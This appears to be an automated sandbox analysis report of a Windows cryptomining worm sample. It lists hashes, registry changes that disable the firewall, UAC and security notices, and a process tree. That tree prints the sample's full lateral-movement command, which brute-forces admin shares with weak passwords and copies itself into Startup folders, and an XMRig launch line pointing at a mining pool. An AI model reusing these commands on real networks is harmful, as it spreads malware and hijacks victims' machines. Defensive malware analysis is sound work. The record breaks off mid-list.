Analysis
max time kernel: 41s
max time network: 577s
platform: windows10_x64
resource: win10v20201028
submitted: 06-03-2021 22:27

Static task: static1
Behavioral task: behavioral1 | Sample: 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe | Resource: win10v20201028
Behavioral task: behavioral2 | Sample: 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe | Resource: win10v20201028
Behavioral task: behavioral3 | Sample: 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe | Resource: win10v20201028
Behavioral task: behavioral4 | Sample: 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe | Resource: win10v20201028
General
Target: 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Size: 2.3MB
MD5: 921379bd587ab29da4dc23fb9d47fe36
SHA1: e9db1731731503a81a2fdc67ffa005e6aa2a8038
SHA256: 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6
SHA512: 90211127d4dd83619bf42a1ab1f5d78d1a9f8ab7767704b19432d681807b636cf2bfbeb5ae97e25b57071e2a04f3b13e5a3f28b69d392b94f7ac0b3015ff38fc
Malware Config
Signatures

Modifies firewall policy service (2 TTPs, 6 IoCs)
Processes: VID001.exe, 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1" | VID001.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1" | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" | VID001.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" | VID001.exe
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.

XMRig Miner Payload (2 IoCs)
resource | yara_rule
C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe | xmrig
behavioral3/memory/3100-32-0x0000000000400000-0x00000000009E7000-memory.dmp | xmrig
Executes dropped EXE (1 IoCs)
pid | process
2756 | VID001.exe

Matches yara rule upx (2 IoCs)
resource | yara_rule
behavioral3/memory/1108-2-0x0000000002360000-0x00000000033EE000-memory.dmp | upx
behavioral3/memory/2756-9-0x00000000022E0000-0x000000000336E000-memory.dmp | upx
Deletes itself (1 IoCs)
pid | process
2756 | VID001.exe

Drops startup file (1 IoCs)
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk | VID001.exe

Loads dropped DLL (2 IoCs)
pid | process
2756 | VID001.exe
2756 | VID001.exe

Windows security modification (14 IoCs)
Processes: 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe, VID001.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | VID001.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" | VID001.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UacDisableNotify = "1" | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | VID001.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | VID001.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | VID001.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\Svc | VID001.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | VID001.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Adds Run key to start application (2 TTPs, 4 IoCs)
Processes: VID001.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\ | VID001.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run | VID001.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ | VID001.exe
Key created | \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run | VID001.exe

Checks whether UAC is enabled (2 IoCs)
Processes: VID001.exe, 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | VID001.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Enumerates connected drives (3 TTPs, 22 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes: VID001.exe
description | ioc | process
File opened (read-only) | \??\M: | VID001.exe
File opened (read-only) | \??\N: | VID001.exe
File opened (read-only) | \??\Q: | VID001.exe
File opened (read-only) | \??\S: | VID001.exe
File opened (read-only) | \??\V: | VID001.exe
File opened (read-only) | \??\X: | VID001.exe
File opened (read-only) | \??\Y: | VID001.exe
File opened (read-only) | \??\H: | VID001.exe
File opened (read-only) | \??\J: | VID001.exe
File opened (read-only) | \??\L: | VID001.exe
File opened (read-only) | \??\T: | VID001.exe
File opened (read-only) | \??\U: | VID001.exe
File opened (read-only) | \??\W: | VID001.exe
File opened (read-only) | \??\R: | VID001.exe
File opened (read-only) | \??\E: | VID001.exe
File opened (read-only) | \??\F: | VID001.exe
File opened (read-only) | \??\G: | VID001.exe
File opened (read-only) | \??\I: | VID001.exe
File opened (read-only) | \??\K: | VID001.exe
File opened (read-only) | \??\O: | VID001.exe
File opened (read-only) | \??\P: | VID001.exe
File opened (read-only) | \??\Z: | VID001.exe

Drops file in Windows directory (1 IoCs)
Processes: 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
description | ioc | process
File opened for modification | C:\Windows\SYSTEM.INI | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
NSIS installer (6 IoCs)
resource | yara_rule
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe | nsis_installer_1
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe | nsis_installer_2
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe | nsis_installer_1
C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe | nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\0F745672_Rar\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe | nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\0F745672_Rar\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe | nsis_installer_2

Discovers systems in the same network (1 TTPs, 3 IoCs)
pid | process
1232 | net.exe
1556 | net.exe
3708 | net.exe

Kills process with taskkill (4 IoCs)
pid | process
4004 | taskkill.exe
3024 | taskkill.exe
2160 | taskkill.exe
3520 | taskkill.exe
Runs net.exe

Runs ping.exe (1 TTPs, 35 IoCs)
pid | process
1792, 1144, 1328, 2072, 1212, 2828, 3900, 3232, 1832, 3264, 3880, 2728, 1308, 2028, 1692, 3120, 2960, 1256, 3812, 1604, 1288, 3364, 4044, 2100, 1700, 2696, 412, 1348, 3356, 3116, 1892, 3640, 3776, 2548, 1160 | PING.EXE (35 instances)

Suspicious behavior: EnumeratesProcesses (10 IoCs)
Processes: 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe, VID001.exe
pid | process
1108 | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe (2 entries)
2756 | VID001.exe (8 entries)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes: 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe, VID001.exe
description | pid | process
Token: SeDebugPrivilege | 1108 | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe (57 entries)
Token: SeDebugPrivilege | 2756 | VID001.exe (7 entries)
Suspicious use of WriteProcessMemory (62 IoCs)
Processes: 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe, VID001.exe
description | pid | process | target process
PID 1108 wrote to memory of 716 | 1108 | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe | fontdrvhost.exe
PID 1108 wrote to memory of 724 | 1108 | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe | fontdrvhost.exe
PID 1108 wrote to memory of 976 | 1108 | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe | dwm.exe
PID 1108 wrote to memory of 2640 | 1108 | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe | sihost.exe
PID 1108 wrote to memory of 2664 | 1108 | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe | svchost.exe
PID 1108 wrote to memory of 2852 | 1108 | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe | taskhostw.exe
PID 1108 wrote to memory of 2396 | 1108 | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe | Explorer.EXE
PID 1108 wrote to memory of 3312 | 1108 | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe | ShellExperienceHost.exe
PID 1108 wrote to memory of 3328 | 1108 | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe | SearchUI.exe
PID 1108 wrote to memory of 3548 | 1108 | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe | RuntimeBroker.exe
PID 1108 wrote to memory of 3736 | 1108 | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe | DllHost.exe
PID 1108 wrote to memory of 2756 | 1108 | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe | VID001.exe (3 entries)
PID 2756 wrote to memory of 716 | 2756 | VID001.exe | fontdrvhost.exe (4 entries)
PID 2756 wrote to memory of 724 | 2756 | VID001.exe | fontdrvhost.exe (4 entries)
PID 2756 wrote to memory of 976 | 2756 | VID001.exe | dwm.exe (4 entries)
PID 2756 wrote to memory of 2640 | 2756 | VID001.exe | sihost.exe (4 entries)
PID 2756 wrote to memory of 2664 | 2756 | VID001.exe | svchost.exe (4 entries)
PID 2756 wrote to memory of 2852 | 2756 | VID001.exe | taskhostw.exe (4 entries)
PID 2756 wrote to memory of 2396 | 2756 | VID001.exe | Explorer.EXE (4 entries)
PID 2756 wrote to memory of 3312 | 2756 | VID001.exe | ShellExperienceHost.exe (4 entries)
PID 2756 wrote to memory of 3328 | 2756 | VID001.exe | SearchUI.exe (4 entries)
PID 2756 wrote to memory of 3548 | 2756 | VID001.exe | RuntimeBroker.exe (4 entries)
PID 2756 wrote to memory of 3736 | 2756 | VID001.exe | DllHost.exe (4 entries)
PID 2756 wrote to memory of 3812 | 2756 | VID001.exe | DllHost.exe
PID 2756 wrote to memory of 1736 | 2756 | VID001.exe | backgroundTaskHost.exe (3 entries)

System policy modification (1 TTPs, 2 IoCs)
Processes: 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe, VID001.exe
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | 50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | VID001.exe
Processes
Process tree: [n] is the nesting depth of the process, the command line follows on the next line, and the signatures that process triggered are listed as bullets beneath it.

[1] C:\Windows\system32\fontdrvhost.exe
    "fontdrvhost.exe"
[1] c:\windows\system32\sihost.exe
    sihost.exe
[1] C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
[1] C:\Windows\System32\RuntimeBroker.exe
    C:\Windows\System32\RuntimeBroker.exe -Embedding
[1] C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
[1] C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
    "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
[1] C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
  [2] C:\Users\Admin\AppData\Local\Temp\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe
      "C:\Users\Admin\AppData\Local\Temp\50cbb85b16d25f9f3edb0c8749932e27db306559546e1feb5effcd7b6aab07e6.exe"
      - Modifies firewall policy service
      - Windows security modification
      - Checks whether UAC is enabled
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - System policy modification
    [3] C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe
        "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe"
        - Modifies firewall policy service
        - Executes dropped EXE
        - Deletes itself
        - Drops startup file
        - Loads dropped DLL
        - Windows security modification
        - Adds Run key to start application
        - Checks whether UAC is enabled
        - Enumerates connected drives
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        - System policy modification
      [4] C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c taskkill /f /im NsCpuCNMiner* & taskkill /f /im IMG0*
        [5] C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im NsCpuCNMiner*
            - Kills process with taskkill
        [5] C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im IMG0*
            - Kills process with taskkill
      [4] C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c taskkill /f /im uihost* & taskkill /f /im DOC0*
        [5] C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im uihost*
            - Kills process with taskkill
        [5] C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im DOC0*
            - Kills process with taskkill
      [4] C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe
          "C:\Users\Admin\AppData\Roaming\TempoRX\uihost64.exe" -o stratum+tcp://xmr-eu2.nanopool.org:14444 -t 1 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka.V --donate-level=1 --coin monero -p x
      [4] C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=VID001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\!s!\%j\VID001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" %d) & net use %c /delete /y & ping -n 20 localhost)))
        [5] C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c net view|find /i "\\" || arp -a|find /i " 1"
          [6] C:\Windows\SysWOW64\net.exe
              net view
              - Discovers systems in the same network
          [6] C:\Windows\SysWOW64\find.exe
              find /i "\\"
          [6] C:\Windows\SysWOW64\ARP.EXE
              arp -a
          [6] C:\Windows\SysWOW64\find.exe
              find /i " 1"
        [5] C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c set str_
        [5] C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c net view \\10.10.0.89|find /i " "
          [6] C:\Windows\SysWOW64\net.exe
              net view \\10.10.0.89
              - Discovers systems in the same network
          [6] C:\Windows\SysWOW64\find.exe
              find /i " "
        [5] C:\Windows\SysWOW64\net.exe
            net use * /delete /y
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo f"
        [5] C:\Windows\SysWOW64\xcopy.exe
            xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.10.0.89\C$\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
        [5] C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo f"
        [5] C:\Windows\SysWOW64\xcopy.exe
            xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.10.0.89\C$\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
        [5] C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo f"
        [5] C:\Windows\SysWOW64\xcopy.exe
            xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.10.0.89\C$\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ /delete /y
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 20 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo f"
        [5] C:\Windows\SysWOW64\xcopy.exe
            xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.10.0.89\Users\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
        [5] C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo f"
        [5] C:\Windows\SysWOW64\xcopy.exe
            xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.10.0.89\Users\Documents and Settings\1\Start Menu\Programs\Startup\VID001.exe"
        [5] C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo f"
        [5] C:\Windows\SysWOW64\xcopy.exe
            xcopy /y /d "C:\Users\Admin\AppData\Roaming\TempoRX\VID001.exe" "\\10.10.0.89\Users\1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VID001.exe"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users /delete /y
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 20 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ """" /user:"1"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users """" /user:"1"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "1" /user:"1"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users "1" /user:"1"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "1" /user:"1"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users "1" /user:"1"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "123" /user:"1"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users "123" /user:"1"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "0" /user:"10.10.0.89"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users "0" /user:"10.10.0.89"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ """" /user:"10.10.0.89"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users """" /user:"10.10.0.89"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "10.10.0.89" /user:"10.10.0.89"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users "10.10.0.89" /user:"10.10.0.89"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "1" /user:"10.10.0.89"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users "1" /user:"10.10.0.89"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "123" /user:"10.10.0.89"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users "123" /user:"10.10.0.89"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "0" /user:"administrator"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users "0" /user:"administrator"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ """" /user:"administrator"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users """" /user:"administrator"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "administrator" /user:"administrator"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users "administrator" /user:"administrator"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "1" /user:"administrator"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users "1" /user:"administrator"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "123" /user:"administrator"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users "123" /user:"administrator"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "0" /user:"user"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users "0" /user:"user"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ """" /user:"user"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users """" /user:"user"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "user" /user:"user"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users "user" /user:"user"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "1" /user:"user"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users "1" /user:"user"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "123" /user:"user"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users "123" /user:"user"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "0" /user:"admin"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users "0" /user:"admin"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ """" /user:"admin"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users """" /user:"admin"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "admin" /user:"admin"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users "admin" /user:"admin"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "1" /user:"admin"
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\Users "1" /user:"admin"
        [5] C:\Windows\SysWOW64\PING.EXE
            ping -n 3 localhost
            - Runs ping.exe
        [5] C:\Windows\SysWOW64\net.exe
            net use \\10.10.0.89\C$ "123" /user:"admin"
        [5] C:\Windows\SysWOW64\net.exe
